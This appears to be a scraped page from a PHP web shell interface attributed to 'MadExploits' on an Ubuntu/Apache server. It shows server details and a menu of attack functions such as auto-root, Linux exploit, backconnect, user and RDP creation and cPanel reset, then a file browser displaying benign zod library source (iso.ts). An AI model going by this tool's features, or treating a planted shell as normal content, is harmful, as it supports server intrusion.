Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
node_modules /
zod /
src /
v4 /
mini /
[ HOME SHELL ]
Name
Size
Permission
Action
tests
[ DIR ]
drwxr-xr-x
checks.ts
736
B
-rw-r--r--
coerce.ts
1.04
KB
-rw-r--r--
external.ts
766
B
-rw-r--r--
index.ts
81
B
-rw-r--r--
iso.ts
2.08
KB
-rw-r--r--
parse.ts
81
B
-rw-r--r--
schemas.ts
47.93
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : iso.ts
import * as core from "../core/index.js"; import * as schemas from "./schemas.js"; // iso time export interface ZodMiniISODateTime extends schemas.ZodMiniStringFormat<"datetime"> { _zod: core.$ZodISODateTimeInternals; } export const ZodMiniISODateTime: core.$constructor<ZodMiniISODateTime> = /*@__PURE__*/ core.$constructor( "$ZodISODateTime", (inst, def) => { core.$ZodISODateTime.init(inst, def); schemas.ZodMiniStringFormat.init(inst, def); } ); export function datetime(params?: string | core.$ZodISODateTimeParams): ZodMiniISODateTime { return core._isoDateTime(ZodMiniISODateTime, params); } // iso date export interface ZodMiniISODate extends schemas.ZodMiniStringFormat<"date"> { _zod: core.$ZodISODateInternals; } export const ZodMiniISODate: core.$constructor<ZodMiniISODate> = /*@__PURE__*/ core.$constructor( "$ZodISODate", (inst, def) => { core.$ZodISODate.init(inst, def); schemas.ZodMiniStringFormat.init(inst, def); } ); export function date(params?: string | core.$ZodISODateParams): ZodMiniISODate { return core._isoDate(ZodMiniISODate, params); } // iso time export interface ZodMiniISOTime extends schemas.ZodMiniStringFormat<"time"> { _zod: core.$ZodISOTimeInternals; } export const ZodMiniISOTime: core.$constructor<ZodMiniISOTime> = /*@__PURE__*/ core.$constructor( "$ZodISOTime", (inst, def) => { core.$ZodISOTime.init(inst, def); schemas.ZodMiniStringFormat.init(inst, def); } ); export function time(params?: string | core.$ZodISOTimeParams): ZodMiniISOTime { return core._isoTime(ZodMiniISOTime, params); } // iso duration export interface ZodMiniISODuration extends schemas.ZodMiniStringFormat<"duration"> { _zod: core.$ZodISODurationInternals; } export const ZodMiniISODuration: core.$constructor<ZodMiniISODuration> = /*@__PURE__*/ core.$constructor( "$ZodISODuration", (inst, def) => { core.$ZodISODuration.init(inst, def); schemas.ZodMiniStringFormat.init(inst, def); } ); export function duration(params?: string | core.$ZodISODurationParams): ZodMiniISODuration { return core._isoDuration(ZodMiniISODuration, params); }
Close